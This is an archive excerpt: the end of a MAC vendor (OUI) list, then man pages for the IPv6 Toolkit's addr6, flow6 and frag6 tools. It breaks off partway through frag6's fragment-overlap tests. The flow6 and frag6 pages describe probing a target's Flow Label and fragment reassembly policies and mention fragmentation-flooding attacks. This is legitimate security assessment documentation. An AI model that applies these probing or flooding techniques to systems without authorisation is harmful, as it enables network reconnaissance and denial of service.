E8-DA-96 (hex) Zhuhai Tianrui Electrical Power Tech. Co., Ltd. E8-DA-AA (hex) VideoHome Technology Corp. E8-DF-F2 (hex) PRF Co., Ltd. E8-E0-8F (hex) GRAVOTECH MARKING SAS E8-E0-B7 (hex) Toshiba E8-E1-E2 (hex) Energotest E8-E5-D6 (hex) Samsung Electronics Co.,Ltd E8-E7-32 (hex) Alcatel-Lucent E8-E7-76 (hex) Shenzhen Kootion Technology Co., Ltd E8-F9-28 (hex) RFTECH SRL EC-14-F6 (hex) BioControl AS EC-23-68 (hex) IntelliVoice Co.,Ltd. EC-30-91 (hex) Cisco Systems EC-3B-F0 (hex) NovelSat EC-3F-05 (hex) Institute 706, The Second Academy China Aerospace Science & Industry Corp EC-43-E6 (hex) AWCER Ltd. EC-44-76 (hex) Cisco Systems EC-46-44 (hex) TTK SAS EC-46-70 (hex) Meinberg Funkuhren GmbH & Co. KG EC-54-2E (hex) Shanghai XiMei Electronic Technology Co. Ltd EC-55-F9 (hex) Hon Hai Precision Ind. Co.,Ltd. EC-5C-69 (hex) MITSUBISHI HEAVY INDUSTRIES MECHATRONICS SYSTEMS,LTD. EC-62-64 (hex) Global411 Internet Services, LLC EC-63-E5 (hex) ePBoard Design LLC EC-66-D1 (hex) B&W Group LTD EC-6C-9F (hex) Chengdu Volans Technology CO.,LTD EC-7C-74 (hex) Justone Technologies Co., Ltd. EC-7D-9D (hex) MEI EC-83-6C (hex) RM Tech Co., Ltd. EC-8E-AD (hex) DLX EC-92-33 (hex) Eddyfi NDT Inc EC-96-81 (hex) 2276427 Ontario Inc EC-98-6C (hex) Lufft Mess- und Regeltechnik GmbH EC-98-C1 (hex) Beijing Risbo Network Technology Co.,Ltd EC-9A-74 (hex) Hewlett Packard EC-9B-5B (hex) Nokia Corporation EC-9E-CD (hex) Emerson Network Power and Embedded Computing EC-B1-06 (hex) Acuro Networks, Inc EC-BB-AE (hex) Digivoice Tecnologia em Eletronica Ltda EC-BD-09 (hex) FUSION Electronics Ltd EC-C3-8A (hex) Accuenergy (CANADA) Inc EC-C8-82 (hex) Cisco Systems EC-CD-6D (hex) Allied Telesis, Inc. EC-D0-0E (hex) MiraeRecognition Co., Ltd. EC-DE-3D (hex) Lamprey Networks, Inc. EC-E0-9B (hex) Samsung electronics CO., LTD EC-E5-55 (hex) Hirschmann Automation EC-E7-44 (hex) Omntec mfg. inc EC-E9-0B (hex) SISTEMA SOLUCOES ELETRONICAS LTDA - EASYTECH EC-E9-F8 (hex) Guang Zhou TRI-SUN Electronics Technology Co., Ltd EC-EA-03 (hex) DARFON LIGHTING CORP EC-F0-0E (hex) Abocom EC-F2-36 (hex) NEOMONTANA ELECTRONICS EC-FA-AA (hex) The IMS Company EC-FE-7E (hex) BlueRadios, Inc. F0-00-7F (hex) Janz - Contadores de Energia, SA F0-02-2B (hex) Chrontel F0-02-48 (hex) SmarteBuilding F0-08-F1 (hex) Samsung Electronics Co.,Ltd F0-13-C3 (hex) SHENZHEN FENDA TECHNOLOGY CO., LTD F0-1C-13 (hex) LG Electronics F0-24-08 (hex) Talaris (Sweden) AB F0-25-72 (hex) Cisco Systems F0-26-4C (hex) Dr. Sigrist AG F0-2A-61 (hex) Waldo Networks, Inc. F0-2F-D8 (hex) Bi2-Vision F0-3A-55 (hex) Omega Elektronik AS F0-43-35 (hex) DVN(Shanghai)Ltd. F0-4A-2B (hex) PYRAMID Computer GmbH F0-4B-6A (hex) Scientific Production Association Siberian Arsenal, Ltd. F0-4B-F2 (hex) JTECH Communications, Inc. F0-4D-A2 (hex) Dell Inc. F0-58-49 (hex) CareView Communications F0-5D-89 (hex) Dycon Limited F0-62-0D (hex) Shenzhen Egreat Tech Corp.,Ltd F0-62-81 (hex) ProCurve Networking by HP F0-65-DD (hex) Primax Electronics Ltd. F0-68-53 (hex) Integrated Corporation F0-77-D0 (hex) Xcellen F0-7B-CB (hex) Hon Hai Precision Ind. Co.,Ltd. F0-7D-68 (hex) D-Link Corporation F0-81-AF (hex) IRZ AUTOMATION TECHNOLOGIES LTD F0-8B-FE (hex) COSTEL.,CO.LTD F0-93-3A (hex) NxtConect F0-9C-BB (hex) RaonThink Inc. F0-A2-25 (hex) PRIVATE F0-A7-64 (hex) GST Co., Ltd. F0-AD-4E (hex) Globalscale Technologies, Inc. F0-AE-51 (hex) Xi3 Corp F0-B4-79 (hex) Apple F0-B6-EB (hex) Poslab Technology Co., Ltd. F0-BC-C8 (hex) MaxID (Pty) Ltd F0-BD-F1 (hex) Sipod Inc. F0-BF-97 (hex) Sony Corporation F0-C2-4C (hex) Zhejiang FeiYue Digital Technology Co., Ltd F0-C2-7C (hex) Mianyang Netop Telecom Equipment Co.,Ltd. F0-C8-8C (hex) LeddarTech Inc. F0-CB-A1 (hex) Apple, Inc. F0-D7-67 (hex) Axema Passagekontroll AB F0-DA-7C (hex) RLH INDUSTRIES,INC. F0-DB-30 (hex) Yottabyte F0-DE-71 (hex) Shanghai EDO Technologies Co.,Ltd. F0-DE-B9 (hex) ShangHai Y&Y Electronics Co., Ltd F0-DE-F1 (hex) Wistron InfoComm (Kunshan)Co F0-E5-C3 (hex) Draegerwerk AG &amp; Co. KG aA F0-EC-39 (hex) Essec F0-ED-1E (hex) Bilkon Bilgisayar Kontrollu Cih. Im.Ltd. F0-EE-BB (hex) VIPAR GmbH F0-F0-02 (hex) Hon Hai Precision Ind. Co.,Ltd. F0-F7-B3 (hex) Phorm F0-F8-42 (hex) KEEBOX, Inc. F0-F9-F7 (hex) IES GmbH & Co. KG F4-03-21 (hex) BeNeXt B.V. F4-04-4C (hex) ValenceTech Limited F4-0B-93 (hex) Research In Motion F4-1F-0B (hex) YAMABISHI Corporation F4-38-14 (hex) Shanghai Howell Electronic Co.,Ltd F4-3D-80 (hex) FAG Industrial Services GmbH F4-3E-61 (hex) Shenzhen Gongjin Electronics Co., Ltd F4-3E-9D (hex) Benu Networks, Inc. F4-42-27 (hex) S & S Research Inc. F4-44-50 (hex) BND Co., Ltd. F4-45-ED (hex) Portable Innovation Technology Ltd. F4-4E-FD (hex) Actions Semiconductor Co.,Ltd.(Cayman Islands) F4-50-EB (hex) Telechips Inc F4-55-95 (hex) HENGBAO Corporation LTD. F4-55-9C (hex) Huawei Technologies Co., Ltd F4-55-E0 (hex) Niceway CNC Technology Co.,Ltd.Hunan Province F4-5F-D4 (hex) Cisco SPVTG F4-5F-F7 (hex) DQ Technology Inc. F4-63-49 (hex) Diffon Corporation F4-6D-04 (hex) ASUSTek COMPUTER INC. F4-76-26 (hex) Viltechmeda UAB F4-7A-CC (hex) SolidFire, Inc. F4-94-61 (hex) NexGen Storage F4-9F-54 (hex) Samsung Electronics F4-A5-2A (hex) Hawa Technologies Inc F4-AC-C1 (hex) Cisco Systems F4-B1-64 (hex) Lightning Telecommunications Technology Co. Ltd F4-B5-49 (hex) Yeastar Technology Co., Ltd. F4-C7-14 (hex) Huawei Device Co., Ltd F4-C7-95 (hex) WEY Elektronik AG F4-CA-E5 (hex) FREEBOX SA F4-CE-46 (hex) Hewlett-Packard Company F4-D9-FB (hex) Samsung Electronics CO., LTD F4-DC-4D (hex) Beijing CCD Digital Technology Co., Ltd F4-DC-DA (hex) Zhuhai Jiahe Communication Technology Co., limited F4-E1-42 (hex) Delta Elektronika BV F4-E6-D7 (hex) Solar Power Technologies, Inc. F4-EC-38 (hex) TP-LINK TECHNOLOGIES CO., LTD. F4-FC-32 (hex) Texas Instruments F8-03-32 (hex) Khomp F8-0C-F3 (hex) LG Electronics F8-0F-41 (hex) Wistron InfoComm(ZhongShan) Corporation F8-0F-84 (hex) Natural Security SAS F8-10-37 (hex) Atopia Systems, LP F8-1D-93 (hex) Longdhua(Beijing) Controls Technology Co.,Ltd F8-1E-DF (hex) Apple, Inc F8-2F-5B (hex) eGauge Systems LLC F8-31-3E (hex) endeavour GmbH F8-33-76 (hex) Good Mind Innovation Co., Ltd. F8-35-53 (hex) Magenta Research Ltd. F8-3D-FF (hex) Huawei Technologies Co., Ltd F8-46-2D (hex) SYNTEC Incorporation F8-47-2D (hex) X2gen Digital Corp. Ltd F8-52-DF (hex) VNL Europe AB F8-66-F2 (hex) Cisco Systems F8-69-71 (hex) Seibu Electric Co., F8-6E-CF (hex) Arcx Inc F8-71-FE (hex) The Goldman Sachs Group, Inc. F8-76-9B (hex) Neopis Co., Ltd. F8-7B-7A (hex) Motorola Mobility, Inc. F8-7B-8C (hex) Amped Wireless F8-81-1A (hex) OVERKIZ F8-8D-EF (hex) Tenebraex F8-91-2A (hex) GLP German Light Products GmbH F8-93-F3 (hex) VOLANS F8-9D-0D (hex) Control Technology Inc. F8-A9-DE (hex) PUISSANCE PLUS F8-AC-6D (hex) Deltenna Ltd F8-B5-99 (hex) Guangzhou CHNAVS Digital Technology Co.,Ltd F8-C0-01 (hex) Juniper Networks F8-C0-91 (hex) Highgates Technology F8-C6-78 (hex) Carefusion F8-D1-11 (hex) TP-LINK TECHNOLOGIES CO., LTD. F8-D3-A9 (hex) AXAN Networks F8-D7-56 (hex) Simm Tronic Limited F8-DA-E2 (hex) Beta LaserMike F8-DA-F4 (hex) Taishan Online Technology Co., Ltd. F8-DB-7F (hex) HTC Corporation F8-DC-7A (hex) Variscite LTD F8-E7-B5 (hex) uTech Engenharia e Automaçao LTDA F8-E9-68 (hex) Egker Kft. F8-EA-0A (hex) Dipl.-Math. Michael Rauch F8-F0-14 (hex) RackWare Inc. F8-F2-5A (hex) G-Lab GmbH F8-F7-D3 (hex) International Communications Corporation F8-FB-2F (hex) Santur Corporation F8-FE-5C (hex) Reciprocal Labs Corp FC-00-12 (hex) Toshiba Samsung Storage Technolgoy Korea Corporation FC-01-CD (hex) FUNDACION TEKNIKER FC-08-77 (hex) Prentke Romich Company FC-0A-81 (hex) Motorola Solutions Inc. FC-0F-E6 (hex) Sony Computer Entertainment Inc. FC-10-BD (hex) Control Sistematizado S.A. FC-17-94 (hex) InterCreative Co., Ltd FC-1F-C0 (hex) EURECAM FC-2E-2D (hex) Lorom Industrial Co.LTD. FC-2F-40 (hex) Calxeda, Inc. FC-35-98 (hex) Favite Inc. FC-44-63 (hex) Universal Audio FC-45-5F (hex) JIANGXI SHANSHUI OPTOELECTRONIC TECHNOLOGY CO.,LTD FC-4D-D4 (hex) Universal Global Scientific Industrial Co., Ltd. FC-5B-24 (hex) Weibel Scientific A/S FC-5B-26 (hex) MikroBits FC-61-98 (hex) NEC Personal Products, Ltd FC-68-3E (hex) Directed Perception, Inc FC-6C-31 (hex) LXinstruments GmbH FC-75-16 (hex) D-Link International FC-75-E6 (hex) Handreamnet FC-7C-E7 (hex) FCI USA LLC FC-83-29 (hex) Trei technics FC-8E-7E (hex) Pace plc FC-8F-C4 (hex) Intelligent Technology Inc. FC-94-6C (hex) UBIVELOX FC-A1-3E (hex) Samsung Electronics FC-A8-41 (hex) Avaya, Inc FC-AF-6A (hex) Conemtech AB FC-C2-3D (hex) Atmel Corporation FC-C7-34 (hex) Samsung Electronics Co.,Ltd FC-CC-E4 (hex) Ascon Ltd. FC-CF-62 (hex) IBM Corp FC-D4-F2 (hex) The Coca Cola Company FC-D4-F6 (hex) Messana Air.Ray Conditioning s.r.l. FC-E1-92 (hex) Sichuan Jinwangtong Electronic Science&Technology Co,.Ltd FC-E2-3F (hex) CLAY PAKY SPA FC-E5-57 (hex) Nokia Corporation FC-E8-92 (hex) Hangzhou Lancable Technology Co.,Ltd FC-ED-B9 (hex) Arrayent FC-F1-CD (hex) OPTEX-FA CO.,LTD. FC-FA-F7 (hex) Shanghai Baud Data Communication Co.,Ltd. FC-FB-FB (hex) Cisco Systems ipv6toolkit-1.5.1/manuals/000077500000000000000000000000001223702747200154565ustar00rootroot00000000000000ipv6toolkit-1.5.1/manuals/addr6.1000066400000000000000000000234321223702747200165440ustar00rootroot00000000000000.TH ADDR6 1 .SH NAME addr6 \- An IPv6 address analysis and manipulation tool .SH SYNOPSIS .B addr6 .RB [\| \-a .IR IPV6_ADDR\| \ \-i] .RB [\| \-d \|] .RB [\| \-q \|] .RB [\| \-s \|] .RB [\| \-j .IR PREFIX \|] .RB [\| \-b .IR TYPE \|] .RB [\| \-k .IR SCOPE \|] .RB [\| \-w .IR UNICAST_TYPE \|] .RB [\| \-g .IR IID_TYPE \|] .RB [\| \-J .IR PREFIX \|] .RB [\| \-B .IR TYPE \|] .RB [\| \-K .IR SCOPE \|] .RB [\| \-W ,IR UNICAST_TYPE \|] .RB [\| \-G .IR IID_TYPE \|] .RB [\| \-v \|] .RB [\| \-h \|] .SH DESCRIPTION .B addr6 is an IPv6 address analysis tool tool. It can employed identify the address type/scope, and infer the type of Interface ID employed by an IPv6 address. Additionally, .B addr6 can also produce statistics about a set of IPv6 addresses. .B addr6 can filter lists of IPv6 addresses based on a number of criteria (address type, address scope, prefixes, duplicate addresses, etc.). There are two types of filters: "block filters" and "accept filters". If any "block filter" is specified, and IPv6 addresses matching any of those filters will be discarded. If any "accept filter" is specified, any IPv6 address matching that filter will be accepted (and printed on stdout). .SH OPTIONS .B addr6 takes its parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-stdin"). .TP .BI \-a\ IPV6_ADDRESS ,\ \-\-address\ IPV6_ADDRESS This option ca be employed to specify a single IPv6 address that is meant to be processed by the tool. This option is typically employed in conjunction with the '\-d' tool, to decode the IPv6 address in question. .TP .BR \-i ,\ \-\-stdin This option request the tool to read IPv6 addresses from standard input (stdin), until an EOF (End-Of-File) condition is found. .TP .BI \-j\ PREFIX ,\ \-\-address\ PREFIX Accept IPv6 addresses belonging to the specified IPv6 prefix (PREFIX/LEN). .TP .BI \-b\ TYPE ,\ \-\-address\ TYPE Accept IPv6 addresses belonging to the specified address type. Valid address types are: * unicast * unspec * multicast .TP .BI \-k\ SCOPE ,\ \-\-address\ SCOPE Accept IPv6 addresses belonging to the specified address scope. Valid address scopes are: * reserved * interface (or "interface-local) * link (or "link-local") * admin (or "admin-local") * site (or "site-local") * admin (or "admin-local") * organization (or "organization-local") * global * unassigned * unspecified .TP .BI \-w\ UNICAST_TYPE ,\ \-\-address\ UNICAST_TYPE Accept IPv6 addresses belonging to the specified unicast type. Valid unicast address types are: * loopback * ipv4-compat * ipv4-mapped * link-local * site-local * unique-local * 6to4 * teredo * global .TP .BI \-g\ IID_TYPE ,\ \-\-address\ IID_TYPE Accept unicast IPv6 addresses with an Interface ID of the specified type. Valid Interface ID types are: * ieee * isatap * ipv4-32 * ipv4-64 * ipv4-all * embed-port * embed-port-rev * embed-port-all * low-byte * byte-pattern * random .TP .BI \-J\ PREFIX ,\ \-\-address\ PREFIX Block IPv6 addresses belonging to the specified IPv6 prefix (PREFIX/LEN). .TP .BI \-B\ TYPE ,\ \-\-address\ TYPE Block IPv6 addresses belonging to the specified address type. Valid address types are: * unicast * unspec * multicast .TP .BI \-K\ SCOPE ,\ \-\-address\ SCOPE Block IPv6 addresses belonging to the specified address scope. Valid address scopes are: * reserved * interface (or "interface-local) * link (or "link-local") * admin (or "admin-local") * site (or "site-local") * admin (or "admin-local") * organization (or "organization-local") * global * unassigned * unspecified .TP .BI \-W\ UNICAST_TYPE ,\ \-\-address\ UNICAST_TYPE Block IPv6 addresses belonging to the specified unicast type. Valid unicast address types are: * loopback * ipv4-compat * ipv4-mapped * link-local * site-local * unique-local * 6to4 * teredo * global .TP .BI \-G\ IPV6_ADDRESS ,\ \-\-address\ IID_TYPE Block unicast IPv6 addresses with an Interface ID of the specified type. Valid Interface ID types are: * ieee * isatap * ipv4-32 * ipv4-64 * ipv4-all * embed-port * embed-port-rev * embed-port-all * low-byte * byte-pattern * random .TP .BR \-q ,\ \-\-print\-unique This option causes the tool to eliminate duplicate addresses from the list of IPv6 addresses read from standard input (stdin). That is, when reading a list of addresses from stdin, only the first "copy" of each address will be processed by the tool (with later ones being simply ignored). .TP .BR \-d ,\ \-\-print\-decode This option request the tool to decode the IPv6 address specfied with the '\-a' option (or a list of addresses read froom stdin if the '\-i' option was set). The current version of the tool supports only decode type, in which information is printed for each address with the following syntax: AddressType=AddressSubtype=Scope=IIDTYpe=IIDSUbtype This simple syntax is meant to be easy for scripting purposes. Future versions of the tool will incorporate a human-friendly mode. .TP .BR \-s\| ,\ \-\-print\-stats This option requests the tool to produce address statistics from the list of IPv6 addresses read from standard input. This option should be used in conjunction with the '\-i' option, such that multiple addresses can be given as input to addr6. addr6 will always print the total number of IPv6 addresses that have been examined, and the percentage of unicast, multicast, and unspecified (::) addresses. If at least one unicast address is identified, unicast-specific statistics will be printed. In the same way, if at least one multicast address is identified, then multicast-specific statistics will be printed. Unicast-specific statistics include: 1) Number and percentage of each unicast address type (global unicast, link-local unicast, 6to4, Teredo, etc.). 2) Number and percentage of each of the different Interface ID types (IEEE-based, low-byte, etc.). Only those unicast address types for which there are multiple possible types of Interface-IDs will be considered for the Interface-ID assessment. Namely, * 6to4 * Global Unicast * Link-local Unicast * Site-local unicast addresses (deprecated) * Unique local unicast addresses Unicast address types such as 'Teredo' are not considered by this analysis, since they have a single type of Interface-ID, as specified by the corresponding specifications. Multicast-specific statistics include: 1) Number of addresses and percentage of each multicast address type (Permanent, Embedded-RP, etc). 2) Number addresses and percentage of each of the multicast address scope different Interface ID types (Link, Interfa- ce, Global, etc.) .TP .BR \-v\| ,\ \-\-verbose This option selects the "verbosity" of the tool. If this option is left unspecified, only minimum information is printed. .TP .BR \-h\| ,\ \-\-help Print help information for the .B addr6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B addr6 tool. \fBExample #1\fR $ cat addresslist.txt | addr6 \-i \-q addr6 will read IPv6 addresses from stdin ('\-i' option), and will only print the first instance of each address ('\-q' option), thus effectively removing any duplicates from the list. Note: In this particular scenario, the address list results from the command 'cat addresslist.txt', that has its output redirected to the standard input of the addr6 tool. \fBExample #2\fR $ addr6 \-a fc00::1 Decode the IPv6 address spcified with the '\-a' option. Note that while the '\-d' option was not set, this is the default behavior of the tool (unless overridden y another option). \fBExample #3\fR $ cat addresslist.txt | addr6 \-i \-q \-s addr6 will read IPv6 addresses from stdin ('\-i' option), will ignore duplicate addresses ('\-q' option), and will print statistics about the processed IPv6 addresses. Note: In this particular scenario, the address list results from the command 'cat addresslist.txt', that has its output redirected to the standard input of the addr6 tool. \fBExample #4\fR $ cat addresslist.txt | addr6 \-i \-q \-d addr6 will read IPv6 addresses from stdin ('\-i' option), will ignore duplicate addresses ('\-q' option), and will decode each of the remaining addresses. Note: In this particular scenario, the address list results from the command 'cat addresslist.txt', that has its output redirected to the standard input of the addr6 tool. \fBExample #5\fR $ cat addresslist.txt | addr6 \-i \-j 2001:db8::/16 addr6 will read IPv6 addresses from stdin ('\-i' option), will discard any addresses that do not belong to the prefix 2001:db8::/16 (i.e., it will "accept" addresses belonging to such prefix). Note: In this particular scenario, the address list results from the command 'cat addresslist.txt', that has its output redirected to the standard input of the addr6 tool. .SH SEE ALSO .BR ipv6toolkit.conf (5) draft-ietf-opsec-ipv6\-host-scanning (available at: .IR ) for a discussion of different IPv6 address patterns. .SH AUTHOR The .B addr6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-1.5.1/manuals/flow6.1000066400000000000000000000147031223702747200166020ustar00rootroot00000000000000.TH FLOW6 1 .SH NAME flow6 \- A security assessment tool for the IPv6 Flow Label field .SH SYNOPSIS .B flow6 .RB [\| \-i .IR INTERFACE\| ] .BI \-d \|\ DST_ADDR .RB [\| \-S .IR LINK_SRC_ADDR\| ] .RB [\| \-D .IR LINK_DST_ADDR\| ] .RB [\| \-s .IR SRC_ADDR \|[/\| LEN \|]] .RB [\| \-A .IR HOP_LIMIT \|] .RB [\| \-P .IR PROTOCOL \|] .RB [\| \-p .IR PORT \|] .RB [\| \-W \|] .RB [\| \-v \|] .RB [\| \-h \|] .SH DESCRIPTION .B flow6 performs a security assessment of the Flow Label generation policy of a target node. It is part of the SI6 Networks' IPv6 Toolkit: a security assessment suite for the IPv6 protocols. .B flow6 sends a number of probe packets to the target node, and samples the Flow Label values of the corresponding response packets. Based on the sampled values, it tries to infer the Flow Label generation policy of the target. .PP The tool will first send a number of probe packets from single IPv6 address, such that the per-destination policy is determined. The tool will then send probe packets from random IPv6 addresses (from the same prefix as the first probes) such that the "global" Flow Label generation policy can be determined. .PP The tool computes the expected value and the standard deviation of the difference between consecutive-sampled Flow Label values (Labeln \- Labeln\-1) with the intent of inferring the Flow Label generation algorithm of the target node. .PP If the standard deviation of [Labeln \- Labeln\-1] is 0, the Flow Label is assumed to be set to a constant value, and the corresponding value is informed to the user. For small values of the standard deviation, the Flow Label is assumed to be a monotonically\-increasing function with increments of the "expected value", and such "expected value" together with the standard deviation, are informed to the user. For large values of the standard deviation, the Flow Label is assumed to be randomized, and the expected value and standard deviation are informed to the user, as indicators of the "quality" of the Flow Label generation algorithm. .SH OPTIONS .B flow6 takes it parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. If the destination address ("\-d" option) is a link-local address, the interface must be explicitly specified. The interface may also be specified alon with a destination address, with the "\-d" option. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 source address (or IPv6 prefix) to be used for the Source Address of the probe packets. If an IPv6 prefix is specified, the IPv6 Source Address of the ICMPv6 packets will be randomized from that prefix. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the target node. This option cannot be left unspecified. .TP .BI \-A\ HOP_LIMIT ,\ \-\-hop\-limit\ HOP_LIMIT This option specifies the Hop Limit to be used for the IPv6 packets. By default, the Hop Limit is randomized. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link\-layer Source Address of the probe packets (currently, only Ethernet is supported). If left unspecified, the link\-layer Source Address of the packets is set to the real link\-layer address of the network interface. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option specifies the link\-layer Destination Address of the probe packets (currently, only Ethernet is supported). By default, the link\-layer Destination Address is automatically set to the link\-layer address of the destination host (for on-link destinations) or to the link\-layer address of the first\-hop router. .TP .BI \-P\ PROTOCOL ,\ \-\-protocol\ PROTOCOL This option specifies the protocol type of the probe packets. Currently, both "UDP" and "TCP" are supported. If this option is left unspecified, the protocol type defaults to "TCP". .TP .BI \-p\ PORT ,\ \-\-dst\-port\ PORT This option specifies the Destination Port of the probe packets. If left unspecified, the Destination Port defaults to "80" when the IPv6 payload is TCP, and to 53 if the IPv6 payload is UDP. Note: Since it is vital for the tool to receive response packets to be able to infer the Flow Label algorithm of the target, the protocol type and Destination Port should be carefully selected (i.e., the corresponding protocol and Destination Port should not be filter, and the target should respond to packets sent to that protocol/port). .TP .BR \-W,\ \-\-flow\-label\-policy This option instructs the tool to determine the Flow Label generation policy. As of this version of the tool, this option must be specified. .TP .BR \-v\| ,\ \-\-verbose This option instructs the flow6 tool to be verbose. If this option is set twice, the tool is "very verbose", and outputs the sampled Flow Label values (in addition to other information). .TP .BR \-h\| ,\ \-\-help Print help information for the .B flow6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B flow6 tool. \fBExample #1\fR # flow6 \-i eth0 \-\-flow-label-policy \-d fe80::1 \-v Assess the Flow Label generation policy of the host "fe80::1", using the network interface "eth0". Probe packets are TCP segments directed to port 80 (default). Be verbose. In this example, since the IPv6 destination address is a link-local address, the network interface ccard must be explicitly specified. \fBExample #2\fR # flow6 \-d 2001:db8::1 \-\-flow\-label\-policy \-P TCP \-p 22 \-vv Assess the Flow Label generation policy of the host "2001:db8::1". Probe packets are TCP segments directed to port 22. Be very verbose (i.e., list the sampled Flow Label values). .SH AUTHOR The .B flow6 tool and the corresponding manual pages were produced by Fernando Gont for SI6 Networks . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-1.5.1/manuals/frag6.1000066400000000000000000000253411223702747200165520ustar00rootroot00000000000000.TH FRAG6 1 .SH NAME frag6 \- A security assessment tool for IPv6 fragmentation .SH SYNOPSIS .B frag6 .RB [\| \-i .IR INTERFACE\| ] \-d DST_ADDR [\-S LINK_SRC_ADDR] [\-D LINK-DST-ADDR] [\-s SRC_ADDR[/LEN]] [\-A HOP_LIMIT] [\-u DST_OPT_HDR_SIZE] [\-U DST_OPT_U_HDR_SIZE] [\-H HBH_OPT_HDR_SIZE] [\-P FRAG_SIZE] [\-O FRAG_TYPE] [\-o FRAG_OFFSET] [\-I FRAG_ID] [\-T] [\-n] [\-p | \-W | \-X | \-F N_FRAGS] [\-l] [\-z SECONDS] [\-v] [\-h] .SH DESCRIPTION .B frag6 is a security assessment tool for attack vectors based on IPv6 fragments. It is part of the SI6 Networks' IPv6 Toolkit: a security assessment and trouble-shooting suite for the IPv6 protocols. .SH OPTIONS .B frag6 takes it parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. If the destination address ("\-d" option) is a link-local address, the interface must be explicitly specified. The interface may also be specified along with a destination address, with the "\-d" option. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link\-layer Source Address of the probe packets. If left unspecified, the link\-layer Source Address of the packets is set to the real link\-layer address of the network interface. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option specifies the link\-layer Destination Address of the probe packets. By default, the link\-layer Destination Address is automatically set to the link\-layer address of the destination host (for on-link destinations) or to the link\-layer address of the first-hop router. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 source address (or IPv6 prefix) to be used for the Source Address of the outgoing packets. If an IPv6 prefix is specified, the IPv6 Source Address of the outgoing packets will be randomized from that prefix. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the target node. This option cannot be left unspecified. .TP .BI \-A\ HOP_LIMIT ,\ \-\-hop\-limit\ HOP_LIMIT This option specifies the Hop Limit to be used for the IPv6 packets. By default, the Hop Limit is randomized. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the outgoing packet(s). The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the outgoing packet(s). The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. .TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the outgoing packet(s). The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop-by-Hop Options headers may be specified by means of multiple "\-H" options. .TP .BI \-P\ FRAG_SIZE ,\ \-\-frag\-size\ FRAG_SIZE This option specifies the IPv6 fragment payload size. .TP .BI \-O\ FRAG_TYPE ,\ \-\-frag\-type\ FRAG_TYPE This option specifies the fragment "type". Possible types are "first", "middle", "last", and "atomic". If the selected fragment type is "first", the Fragment Offset is automatically set to 0, and the "M" ("More fragments") bit is set to 1. If the selected fragment type is "middle", the Fragment Offset is set to a non-zero value, and the "M" bit is set to 1. If the selected fragment type is "last", the Fragment Offset is set to a non-zero value, and the "M" bit is set to 0. Finally, if the selected fragment type is "atomic", the Fragment Offset is set to 0, and the "M" bit is set to 0. .TP .BI \-o\ FRAG_OFFSET ,\ \-\-frag\-offset\ FRAG_OFFSET This option specifies the Fragment Offset. The Fragment Offset specified by means of this option overrides the value implicitly specified by means of the "\-O" option. .TP .BI \-I\ FRAG_ID ,\ \-\-frag\-id\ FRAG_ID This option specifies the fragment "Identification" value. If left unspecified, the "Identification" value is randomized. .TP .BR \-T\| ,\ \-\-no\-timestamp When assessing the fragment reassembly policy of a target, the fragment payload includes a timestamp value that is used to measure the fragment reassembly timeout. If this option is set, such timestamp will not be included in the payload (and the tool will not be able to measure the fragment reassembly timeout). .TP .BR \-n\| ,\ \-\-no\-responses This option instructs the frag6 tool not to display the responses to the fragments sent. This option is useful when performing a fragmentation-flooding attack, as multiple response packets (ICMPv6 errors) might be received. .TP .BR \-p\| ,\ \-\-frag\-reass\-policy This option instructs the tool to determine the IPv6 fragment reassembly policy of the target. In order to determine the aforementioned policy, the tool performs a number of tests to determine how the target node processes overlapping fragments. The following figures illustrate the sequence of packets that correspond to each of the tests. .TP \fB Test #1\fR .sp .RS 4 .nf Frag. #1: AAAAAAAAAAA Frag. #2: BBBBBBBBBBB .fi .RE \fB Test #2\fR .sp .RS 4 .nf Frag. #1: 